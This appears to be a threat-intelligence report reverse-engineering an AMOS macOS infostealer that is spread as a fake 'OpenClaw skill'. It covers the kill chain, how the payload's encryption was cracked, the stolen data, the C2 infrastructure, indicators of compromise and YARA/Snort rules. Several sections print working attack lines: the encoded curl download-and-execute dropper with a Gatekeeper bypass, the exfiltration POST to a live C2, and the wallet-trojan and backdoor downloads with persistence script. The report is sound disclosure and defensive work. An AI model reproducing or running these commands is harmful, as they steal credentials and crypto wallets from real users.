Fake "OpenClaw Skill" AMOS Stealer: Cracking Two Encryption Schemes, Authenticating Against a Live C2, and Mapping an Active macOS Infostealer Campaign
TL;DR: A macOS infostealer distributed via social engineering -- disguised as an "OpenClaw skill" for Claude Code -- was fully reverse-engineered, both encryption schemes cracked, and the live C2 server authenticated against. The threat actor replaced the payload with a hardened version during our 14-hour analysis window, rotating from an XOR stream cipher to a dual-array subtraction cipher and adding anti-VM gating. Both v1 and v2 decrypt to nearly identical ~63KB AppleScript stealers targeting 13 Chromium browsers, 16 cryptocurrency wallets, 280 browser wallet extensions, Apple Keychain, Safari, Telegram, and Apple Notes. The C2 infrastructure spans a bare-metal Cogent server, a re-registered 7-year-old expired domain behind Cloudflare, and a defunct SaaS platform repurposed for trojanized wallet delivery.
Campaign Overview
On March 2, 2026, we intercepted an active social engineering campaign targeting developers in the Claude Code ecosystem. The lure: a direct message claiming to have found a "weird OpenClaw skill" -- name-dropping the legitimate OpenClaw gateway product to establish credibility. The message includes a fake quickstart guide containing a base64-encoded shell command.
This is AMOS (Atomic macOS Stealer), a C++ variant operating as Malware-as-a-Service. The operator is iterating fast: the binary was replaced mid-analysis, the C2 was hardened within 29 minutes of our authenticated probing, and all three infrastructure domains were registered through the same registrar within a 5-day window.
Kill Chain
Social Engineering (DM: "hey i found this weird openclaw skill")
|
v
Stage 0: base64 + gzip encoded shell command
| eval "$decoded"
v
Stage 1: curl from saramoftah[.]com/curl/<sha256_hash>
| User-Agent filtered -- only curl/ clients get the payload
| Browsers see a fake 404 page
v
Stage 2: Mach-O universal binary dropped to /tmp/helper
| xattr -c --> bypass Gatekeeper quarantine
| chmod +x --> execute
v
Stealer: 62,900-byte AppleScript via osascript
| Phishing dialog: "Application wants to install helper"
| Password validated via dscl . authonly
| Exfil: ditto zip --> curl POST to C2
| Persistence: LaunchDaemon com.finder.helper
| Cleanup: rm artifacts + pkill Terminal
v
Trojanized Wallet Apps: Ledger Wallet + Trezor Suite replaced
Stage 1: The Dropper
The initial payload at hxxps://saramoftah[.]com/curl/<sha256> delivers a gzipped, base64-encoded zsh script. The URL path uses a SHA256-like hash to mimic content-addressed storage systems.
#!/bin/zsh
mkgrc9=$(base64 -D <<'PAYLOAD_END' | gunzip
H4sIAKgRpGkC/13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFM
BpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ/zccsxO5j631+pbrYTnkSAAAAA
PAYLOAD_END
)
eval "$mkgrc9"
Decoded:
curl -o /tmp/helper https://saramoftah.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper
The /n8n/update path mimics the legitimate n8n workflow automation platform. The xattr -c strips the com.apple.quarantine attribute, neutralizing Gatekeeper without any user interaction.
Server-Side User-Agent Filtering
The delivery server discriminates on User-Agent with a case-insensitive regex matching curl/ followed by a version:
| User-Agent | Response |
|---|---|
curl/8.5.0 (default) | 200 -- serves Mach-O binary |
curl/7.88.1 | 200 -- serves Mach-O binary |
Mozilla/5.0 (any browser) | 404 -- fake nginx error page |
python-requests/2.31.0 | 404 |
Wget/1.21 | 404 |
| Empty | 404 |
This defeats casual researcher inspection (visiting in a browser shows "404"), standard crawlers, and automated sandboxes using non-curl User-Agents.
Stage 2: Binary Analysis
v1 -- Self-Contained Stealer (first observed 2026-03-02 02:46 UTC)
| Property | Value |
|---|---|
| Type | Mach-O FAT (x86_64 + arm64) |
| Size | 578,152 bytes |
| SHA256 (fat) | 2db8a97685a7ba523efa88308a765b3b33a6370333dc1044c2b3e45be513caa6 |
| SHA256 (x86_64) | c0e288edacfc500309d4b5aa9d3a63024e4daeaf4d7a301184d5acc761a9b789 |
| SHA256 (arm64) | 43aa9e588b0af8524bdde6c5e2f685c0a9085d8034e145fac37d7c7a205706fe |
| UUID (x86_64) | 7d6ac493-cc95-3930-9f41-13263f1f9c88 |
The binary is 97% encrypted data, 3% code:
| Section | Size | Purpose |
|---|---|---|
__TEXT.__text | 7,506 B | Decryption stub -- ~28 functions total |
__TEXT.__const | 252,068 B | Encrypted payload (entropy 6.97) |
__DATA.__la_symbol_ptr | 104 B | 13 lazy symbol entries |
The import table is deliberately minimal: dlsym for dynamic API resolution, bzero, steady_clock::now() for anti-debug timing, and C++ runtime functions. Everything else -- system(), file I/O, network calls -- is resolved at runtime through dlsym(RTLD_DEFAULT, "decrypted_function_name"). Static analysis tools like otool -L reveal nothing about the binary's actual capabilities.
v2 -- Dropper Variant (replaced v1 at ~16:00 UTC, same day)
| Property | Value |
|---|---|
| Size | 2,881,016 bytes (+398%) |
| SHA256 (fat) | f42e795b098e35075ed2d3601b8fe3dc60a745f4c29cb82e994cdda096a71df3 |
| UUID (x86_64) | 8b42d9ad-f901-37fc-bb34-ea4d86791665 |
| UUID (arm64) | 2dfe2ad3-5f58-3a94-8ba7-247d722ff953 |
Critical changes from v1:
| Feature | v1 | v2 |
|---|---|---|
| Size | 578 KB | 2,881 KB |
__TEXT.__const | 246 KB | 1,359 KB (+452%) |
| API resolution | dlsym (runtime) | fork/execvp/waitpid |
__cstring | none | /bin/zsh -c |
| Anti-VM | none | system_profiler checks |
| Encryption | XOR stream + S-box | Dual-array subtraction |
| Execution model | Self-contained | Decrypts shell command, forks zsh |
v2 is architecturally a dropper: it decrypts a command, fork()s, and the child calls execvp("/bin/zsh", ["/bin/zsh", "-c", <command>]). The stealer logic now runs as a shell-invoked AppleScript rather than through hooked native API calls, evading behavioral detection that intercepts SecItemCopyMatching or sqlite3_open.
Cracking the Encryption
v1: XOR Stream Cipher + 256-Byte S-Box Substitution
The v1 binary uses a 4-layer encryption scheme:
Layer 1 -- Custom Base64 Alphabet Generation:
Five 512-byte lookup tables (128 entries each) at __const offsets produce a 64-byte custom alphabet via rotational arithmetic:
for i in range(128):
diff = (table_A[i] - table_E[i]) & 0xFFFFFFFF
shift = table_D[i] & 7
part1 = (diff & 0xFF) >> shift
part2 = (diff << ((-shift) & 7)) & 0xFF
combined = part1 | part2
result = ((combined ^ table_C[i]) - table_B[i]) & 0xFF
sbox[i] = result
Output: Lu-JtepNPYm3WcHE7w%$q+sKRjdBlvaF_)IS#Qf*A(nUr2>@TboxX&Z!O18?gzV6
Layer 2 -- XOR Stream Cipher + Substitution:
sbox256 = const_data[171040:171040+256] # 256-byte permutation table
encrypted = const_data[3296:3296+167734]
key = 0x5C # initial key
for i in range(167734):
xored = encrypted[i] ^ (key & 0xFF)
decrypted = sbox256[xored]
output[i] = decrypted
key = ((key ^ decrypted) + i) & 0xFFFFFFFF # rolling key update
Layers 3-4: Hex decode the stream cipher output, then custom base64 decode using the Layer 1 alphabet. Final output: 62,900-byte cleartext AppleScript.
v2: Dual-Array Subtraction Cipher + Anti-VM Gate
v2 uses a completely different encryption architecture. The 5x size increase is explained by the dual-array encoding: each byte is stored as two correlated uint32 values across parallel arrays.
Stage A -- Custom Alphabet (same triplet method, different tables):
128 triplets produce a new 64-byte alphabet:
j5Z_Do?iVH=2+9O#d0QCwBAlgq<>uU68NT*EF1Yke4ac!$tM-X%GKLSmnIJv&p)@
Stage B -- Anti-VM Guard (new in v2):
Before decrypting the main payload, v2 fork/exec's a 1,516-byte AppleScript that checks:
| Check | Command | Kill Indicators |
|---|---|---|
| Memory | system_profiler SPMemoryDataType | QEMU, VMware, KVM |
| Hardware | system_profiler SPHardwareDataType | Z31FHXYQ0J, C07T508TG1J2, C02TM2ZBHX87, Chip: Unknown, Intel Core 2 |
The serial numbers Z31FHXYQ0J, C07T508TG1J2, and C02TM2ZBHX87 are defaults used by VMware Fusion and Parallels Desktop VMs. If any match, exit code 100 is returned and the main payload is never decrypted -- it never exists in memory inside a sandbox.
Stage C -- Main Payload (the new cipher):
# Two parallel arrays, 167,694 entries each
data1 = const_data[48544:48544 + 167694*4] # 670,776 bytes
data2 = const_data[719328:719328 + 167694*4] # 670,776 bytes
for i in range(167694):
val1 = uint32_le(data1[i*4:(i+1)*4])
val2 = uint32_le(data2[i*4:(i+1)*4])
output[i] = ((val2 >> 16) ^ (val1 - val2)) & 0xFF
Output: 167,694 hex chars --> hex decode (83,847 bytes) --> base64 decode --> 62,885 bytes of AppleScript.
Stage D -- Cleanup Command (XOR + S-box, initial key 0x1D):
Decrypts to: disown; pkill Terminal
v1 vs v2 Payload Diff
Both produce 951-line AppleScripts. Out of 216 unique decoded strings, 214 are identical. Only the C2 credentials rotated:
| Field | v1 | v2 |
|---|---|---|
user header (auth token) | ImIKrsM9Gw5BAN14nf6znrLb12emIlTgC9ZLW3MgtFQ= | -czeGXNGf-QeHMot5l/3CughihQWlBKVZGpvk1siAtw= |
BuildID header | brIyWXoYkYAXOR/cnm/2l8iLv3rlv0EUdYZcPwKB5fU= | iQorUGf6SNQ1EChuIzMqfvTavnAP5gPolmR43L0n2Ss= |
All obfuscated variable names are re-randomized (e.g., hxnpplbhay --> hhhoudflfd), but the stealing logic, target list, and exfiltration method are identical.
Decrypted Payload: What the Stealer Takes
Password Phishing
The stealer presents a fake system dialog:
Title: "Application wants to install helper"
Message: "Required Application Helper. Please enter device password to continue."
Button: "Continue"
Password validation: dscl . authonly <username> <password>. Loops until correct (150-second timeout).
Browser Theft (13 Chromium + 2 Firefox)
Chromium targets:
| Browser | Application Support Path |
|---|---|
| Chrome | Google/Chrome/ |
| Brave | BraveSoftware/Brave-Browser/ |
| Edge | Microsoft Edge/ |
| Vivaldi | Vivaldi/ |
| Opera | com.operasoftware.Opera/ |
| Opera GX | com.operasoftware.OperaGX/ |
| Chrome Beta/Canary/Dev | Google/Chrome Beta/, Canary/, Dev/ |
| Chromium | Chromium/ |
| Arc | Arc/User Data/ |
| CocCoc | CocCoc/Browser/ |
Per-profile data stolen: Cookies, Login Data, Web Data, Local Extension Settings, Local Storage leveldb, IndexedDB, History.
Firefox targets: Firefox and Waterfox profile directories -- cookies.sqlite, formhistory.sqlite, key4.db, logins.json, places.sqlite.
Cryptocurrency Wallet Theft (16 Desktop + 280 Extensions)
| Wallet | Target Path |
|---|---|
| Electrum | ~/.electrum/wallets/ |
| Coinomi | Coinomi/wallets/ |
| Exodus | Exodus/ |
| Atomic | atomic/Local Storage/leveldb/ |
| Wasabi | ~/.walletwasabi/client/Wallets/ |
| Ledger Live | Ledger Live/ |
| Monero | Monero/wallets/ |
| Bitcoin Core | Bitcoin/wallets/ |
| Litecoin Core | Litecoin/wallets/ |
| Dash Core | DashCore/wallets/ |
| Electrum-LTC | ~/.electrum-ltc/wallets/ |
| Electron Cash | ~/.electron-cash/wallets/ |
| Guarda | Guarda/ |
| Dogecoin Core | Dogecoin/wallets/ |
| Trezor Suite | @trezor/suite-desktop/ |
| Sparrow | ~/.sparrow/wallets/ |
The stealer also scans Chromium Local Extension Settings for 280 wallet extension IDs (MetaMask, Phantom, Rabby, etc.) and exfiltrates their entire data directories.
Desktop Wallet App Trojaning
If the macOS password was captured, the stealer replaces legitimate wallet applications with trojanized clones:
# Kill, replace, and relaunch Ledger Wallet
pkill "Ledger Wallet"
echo <password> | sudo -S rm -r /Applications/Ledger Wallet.app
curl https://wusetail.com/zxc/app.zip -o /tmp/app.zip
ditto -x -k /tmp/app.zip /Applications
chmod -R +x /Applications/Ledger Wallet.app
open /Applications/Ledger Wallet.app
# Same for Trezor Suite (from wusetail.com/zxc/apptwo.zip)
Other Targets
| Target | Method |
|---|---|
| macOS Keychain | Copies login.keychain-db + UUID-named keychain |
| Safari | Cookies.binarycookies, Form Values, container cookies |
| Apple Notes | Scripting Bridge (reads ALL notes, ALL accounts) + NoteStore.sqlite + media attachments (up to 30MB) |
| Telegram | tdata/ session directory |
| OpenVPN | profiles/ directory |
| Desktop/Documents files | FileGrabber: txt, pdf, docx, wallet, key, keys, seed, kdbx, jpg, png (30MB cap) |
| Installed apps | Full /Applications/ listing |
| Hardware UUID | system_profiler SPHardwareDataType |
Exfiltration
ditto -c -k --sequesterRsrc /tmp/<random>/ /tmp/out.zip
curl --connect-timeout 120 --max-time 300 -X POST \
-H "user: <auth_token>" \
-H "BuildID: <build_id>" \
-H "cl: 0" -H "cn: 0" \
-F "file=@/tmp/out.zip" \
http://38.244.158.103/contact
# Fallback: https://avipstudios.com/contact (3 retries, 15s delay)
Note the header semantics are deliberately swapped: the user header carries the authentication token (not a username), and BuildID carries the build identifier. The obfuscated variable flow maps vzaetuerljii --> user: and iqcighlghfi --> BuildID:.
C2 Infrastructure
Architecture
PAYLOAD DELIVERY DATA EXFILTRATION
================ =================
saramoftah[.]com 38.244.158.103 (Primary C2)
Cloudflare-fronted Cogent AS174, bare IP, HTTP only
Reg: 2026-02-28 nginx --> Javalin/Jetty backend
Serves /curl/* (UA-gated) POST /contact (auth required)
Serves /n8n/update |
| fallback
v
avipstudios[.]com (Backup C2)
Cloudflare-fronted
Reg: 2026-02-23 (re-registered
expired domain, orig. 2019-2025)
Identical backend behavior
TROJAN DELIVERY
===============
wusetail[.]com (Persistence/Trojan server)
EXPIRED -- DNS does not resolve
/zxc/app.zip (trojanized Ledger Wallet)
/zxc/apptwo.zip (trojanized Trezor Suite)
/zxc/kito (persistence backdoor)
History: restaurant/franchise SaaS (McAlister's, Slim Chickens, etc.)
Primary C2: 38.244.158.103
| Field | Value |
|---|---|
| ASN | AS174 Cogent Communications |
| Subnet | 38.244.128.0/17 (3NT Solutions allocation) |
| Open Ports | 22 (SSH), 80 (HTTP) |
| SSH | OpenSSH_8.9p1 Ubuntu-3ubuntu0.13 (Ubuntu 22.04) |
| Web Server | nginx --> Javalin/Jetty (Java/Kotlin backend) |
| HTTPS | Not available |
| Reverse DNS | None |
| Shodan | No information |
| OTX | Reputation 0 (clean) |
SSH Host Key Fingerprints:
ED25519: SHA256:jhptH1+QOYbydpnl6BqPbnahYE1ZbknFDBUeJRXSK80
RSA: SHA256:xGM9p/DWxEkjEW4Twn71ul54cq4zsbGK0s2uTjDSUF8
ECDSA: SHA256:BVVMZBdgWgCinQc0GXoIaxF2Q6K9kV1f0BMeCRvkmno
The CSP headers leak the admin panel technology stack:
Content-Security-Policy: default-src 'self';
script-src 'self' 'unsafe-inline' https://code.jquery.com https://cdn.jsdelivr.net;
style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net;
img-src 'self' data:;
font-src 'self'; connect-src 'self'
jQuery + jsdelivr CDN (likely Bootstrap) with unsafe-inline -- indicates a web admin panel exists, though it was not accessible on port 80 during our analysis.
C2 Protocol (Fully Reverse-Engineered)
We authenticated against the live C2 using credentials extracted from the decrypted payload and mapped the full error protocol:
| HTTP Status | Body | Meaning |
|---|---|---|
| 400 | Error 1005 | Authentication failure (invalid user token) |
| 400 | Error 1013 | Missing multipart content-type |
| 400 | file too small | Auth OK, file under minimum size (~2KB) |
| 409 | Error 1012 | Format conflict or credential rotation |
| 200 | OK | Upload accepted |
Minimum viable exfiltration request requires: user header (validated), cl header (any value), and a multipart file field (size-checked).
Backup C2: avipstudios[.]com
Registered 2026-02-23 via Hello Internet Corp -- a re-registered expired domain. Certificate Transparency logs show continuous Let's Encrypt coverage from 2019-02-07 through 2025-10-19 under the original owner (cPanel infrastructure: webmail, cpcontacts, webdisk subdomains). The domain expired and was snatched by the threat actor to bypass domain reputation systems using 7 years of legitimate history.
Trojan Server: wusetail[.]com
Not currently registered (WHOIS returns "No match"). CT logs reveal it was a restaurant/franchise management SaaS platform serving brands like McAlister's Deli, Slim Chickens, Noodles, and Swig -- with subdomains for admin, api, app, dashboard, staging, QA, and UUID-based tenant instances. The attacker either compromised it before expiry or re-registered afterward to host backdoor payloads at /zxc/.
Registrar Correlation
All attacker-controlled domains use Hello Internet Corp (IANA ID 1924):
| Domain | Registered | Purpose |
|---|---|---|
| avipstudios[.]com | 2026-02-23 | Backup C2 |
| saramoftah[.]com | 2026-02-28 | Payload delivery |
Persistence Mechanism
The stealer installs a system-level LaunchDaemon:
Phase 1 -- Download backdoor:
curl -o /Users/<user>/.mainhelper https://wusetail.com/zxc/kito
Phase 2 -- Create agent script (~/.agent):
while true; do
osascript <<EOF
set loginContent to do shell script "stat -f \"%Su\" /dev/console"
if loginContent is not equal to "" and loginContent is not equal to "root"
do shell script "sudo -u " & quoted form of loginContent & " /Users/<user>/.mainhelper"
end if
EOF
sleep 1
done
Phase 3 -- Install LaunchDaemon (/Library/LaunchDaemons/com.finder.helper.plist):
<dict>
<key>Label</key>
<string>com.finder.helper</string>
<key>ProgramArguments</key>
<array>
<string>/bin/bash</string>
<string>/Users/<user>/.agent</string>
</array>
<key>RunAtLoad</key><true/>
<key>KeepAlive</key><true/>
</dict>
The daemon runs at boot, keeps alive on crash, and continuously executes the backdoor binary as the currently logged-in console user.
Operator Response to Analysis
Within 29 minutes of our first authenticated probe, the operator hardened the C2:
| Change | Before (19:16 UTC) | After (19:45 UTC) |
|---|---|---|
/console/* endpoints | 400 Bad Request | 404 (removed) |
| Upload with valid auth | HTTP 200 "OK" | 409 "Error 1012" |
| Upload with v1 creds | "file too small" | "Error 1012" |
| Auth validation | Still works | Still works |
The operator removed admin console endpoints, likely rotated credential validation or added IP filtering, but did not change the CSP headers or general server configuration. The authentication mechanism itself (returning Error 1005 for invalid tokens) remained functional -- only uploads were blocked.
MITRE ATT&CK Mapping
| Technique | ID | Implementation |
|---|---|---|
| Phishing: Spearphishing via Service | T1566.003 | DM impersonating community member |
| User Execution: Malicious File | T1204.002 | curl | bash install pattern |
| Command and Scripting Interpreter: AppleScript | T1059.002 | 62KB osascript payload |
| Command and Scripting Interpreter: Unix Shell | T1059.004 | zsh dropper, bash agent script |
| Subvert Trust Controls: Gatekeeper Bypass | T1553.001 | xattr -c removes quarantine |
| Credentials from Password Stores: Keychain | T1555.001 | Copies login.keychain-db |
| Credentials from Web Browsers | T1555.003 | 13 Chromium + 2 Firefox |
| Input Capture: GUI Input Capture | T1056.002 | Fake "install helper" dialog |
| Steal Web Session Cookie | T1539 | Cookies.binarycookies, browser cookies |
| Data from Local System | T1005 | FileGrabber, Notes, wallet files |
| Application Layer Protocol: Web | T1071.001 | curl POST multipart to /contact |
| Exfiltration Over C2 Channel | T1041 | ZIP archive via HTTP POST |
| Boot or Logon Autostart: Launch Daemon | T1543.004 | com.finder.helper LaunchDaemon |
| Masquerading: Match Legitimate Name | T1036.005 | "com.finder.helper" mimics macOS |
| Virtualization/Sandbox Evasion: System Checks | T1497.001 | system_profiler VM detection (v2) |
| Obfuscated Files or Information | T1027 | Multi-layer custom encryption |
| Dynamic Resolution: dlsym | T1106 | Runtime API resolution (v1) |
| Supply Chain Compromise: Compromise Software Supply Chain | T1195.002 | Trojanized Ledger/Trezor apps |
| Acquire Infrastructure: Domains | T1583.001 | saramoftah.com, avipstudios.com |
| Compromise Infrastructure | T1584.001 | wusetail.com (expired SaaS domain) |
Timeline
| Time (UTC) | Event |
|---|---|
| 2026-02-23 | avipstudios[.]com re-registered (backup C2) |
| 2026-02-28 14:30 | Let's Encrypt cert for saramoftah[.]com |
| 2026-02-28 15:24 | saramoftah[.]com registered |
| 2026-03-02 02:46 | v1 payload captured (578 KB) |
| 2026-03-02 ~16:00 | Payload replaced -- v2 deployed (2,881 KB) |
| 2026-03-02 16:54 | v2 payload captured |
| 2026-03-02 ~19:00 | v2 binary fully cracked |
| 2026-03-02 19:10 | C2 authentication cracked |
| 2026-03-02 19:16 | Successful upload to live C2 (HTTP 200) |
| 2026-03-02 19:45 | Operator locks down C2 (Error 1012) |
Indicators of Compromise
Network
# Payload delivery
saramoftah[.]com
hxxps://saramoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d194205e
hxxps://saramoftah[.]com/n8n/update
# Primary C2
38.244.158[.]103
hxxp://38.244.158[.]103/contact
# Backup C2
avipstudios[.]com
hxxps://avipstudios[.]com/contact
# Trojan/persistence server
wusetail[.]com
hxxps://wusetail[.]com/zxc/app.zip
hxxps://wusetail[.]com/zxc/apptwo.zip
hxxps://wusetail[.]com/zxc/kito
File Hashes (SHA256)
# v1 (self-contained stealer)
2db8a97685a7ba523efa88308a765b3b33a6370333dc1044c2b3e45be513caa6 fat binary
c0e288edacfc500309d4b5aa9d3a63024e4daeaf4d7a301184d5acc761a9b789 x86_64 slice
43aa9e588b0af8524bdde6c5e2f685c0a9085d8034e145fac37d7c7a205706fe arm64 slice
# v2 (dropper variant)
f42e795b098e35075ed2d3601b8fe3dc60a745f4c29cb82e994cdda096a71df3 fat binary
cb6f0a7ad45a3c4669786920264ab3551dc00a5dff518696b0f08a6fc3b75c36 x86_64 slice
# Decrypted payload
33f253af4f8b6068a124dc445511486ad886142195ec88933ea28286920896d8 v2 AppleScript
C2 Authentication Tokens
# v1 credentials
user: ImIKrsM9Gw5BAN14nf6znrLb12emIlTgC9ZLW3MgtFQ=
BuildID: brIyWXoYkYAXOR/cnm/2l8iLv3rlv0EUdYZcPwKB5fU=
# v2 credentials (rotated)
user: -czeGXNGf-QeHMot5l/3CughihQWlBKVZGpvk1siAtw=
BuildID: iQorUGf6SNQ1EChuIzMqfvTavnAP5gPolmR43L0n2Ss=
SSH Fingerprints (38.244.158.103)
ED25519: SHA256:jhptH1+QOYbydpnl6BqPbnahYE1ZbknFDBUeJRXSK80
RSA: SHA256:xGM9p/DWxEkjEW4Twn71ul54cq4zsbGK0s2uTjDSUF8
ECDSA: SHA256:BVVMZBdgWgCinQc0GXoIaxF2Q6K9kV1f0BMeCRvkmno
Host Artifacts
/tmp/helper # Dropped binary
/tmp/<5-digit random>/ # Staging directory
/tmp/out.zip # Exfil archive
/Users/<user>/.username # Build ID temp file
/Users/<user>/.pass # Stolen password temp file
/Users/<user>/.logged # Infection marker ("user10")
/Users/<user>/.agent # Persistence script
/Users/<user>/.mainhelper # Backdoor binary
/Library/LaunchDaemons/com.finder.helper.plist # LaunchDaemon
Detection Signatures
Snort/Suricata:
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"AMOS Stealer C2 Upload - V2 Auth";
content:"user|3a 20|"; http_header;
content:"-czeGXNGf-QeHMot5l/3CughihQWlBKVZGpvk1siAtw="; http_header;
content:"POST"; http_method;
content:"/contact"; http_uri;
sid:2026030201; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"AMOS Stealer C2 Upload - V1 Auth";
content:"user|3a 20|"; http_header;
content:"ImIKrsM9Gw5BAN14nf6znrLb12emIlTgC9ZLW3MgtFQ="; http_header;
content:"POST"; http_method;
content:"/contact"; http_uri;
sid:2026030202; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"AMOS Stealer Backdoor Download";
content:"wusetail.com"; http_header;
content:"/zxc/kito"; http_uri;
sid:2026030203; rev:1;)
YARA:
rule OpenClaw_AMOS_Stealer {
meta:
description = "AMOS stealer distributed as fake OpenClaw skill"
author = "breakglass.intelligence"
date = "2026-03-02"
severity = "high"
strings:
$v2_user = "-czeGXNGf-QeHMot5l/3CughihQWlBKVZGpvk1siAtw=" ascii
$v2_build = "iQorUGf6SNQ1EChuIzMqfvTavnAP5gPolmR43L0n2Ss=" ascii
$v1_user = "ImIKrsM9Gw5BAN14nf6znrLb12emIlTgC9ZLW3MgtFQ=" ascii
$v1_build = "brIyWXoYkYAXOR/cnm/2l8iLv3rlv0EUdYZcPwKB5fU=" ascii
$c2_ip = "38.244.158.103" ascii
$backup_c2 = "avipstudios.com" ascii
$payload_server = "wusetail.com" ascii
$backdoor_path = "/zxc/kito" ascii
$persistence = "com.finder.helper" ascii
$phishing_dialog = "Application wants to install helper" ascii
$password_validate = "dscl . authonly" ascii
condition:
any of them
}
rule AMOS_MachoStructure_Generic {
meta:
description = "AMOS C++ Mach-O structural indicators"
author = "breakglass.intelligence"
date = "2026-03-02"
strings:
$macho = { CF FA ED FE }
$zsh = "/bin/zsh" ascii
$zsh_flag = "-c" ascii
condition:
$macho at 0 and $zsh and $zsh_flag and
filesize > 500KB and filesize < 5MB
}
TLS Certificate Serials
05:ff:b2:64:4f:4d:7f:be:49:28:4b:67:8d:d7:67:a4:9d:f7 (LE E8 - saramoftah.com)
00:f1:83:44:90:6a:43:c1:82:99:e4:01:1a:ad:a3:0f:d9 (Sectigo DV E36 - saramoftah.com)
Analysis by breakglass.intelligence | 2026-03-02 Campaign status: ACTIVE at time of publication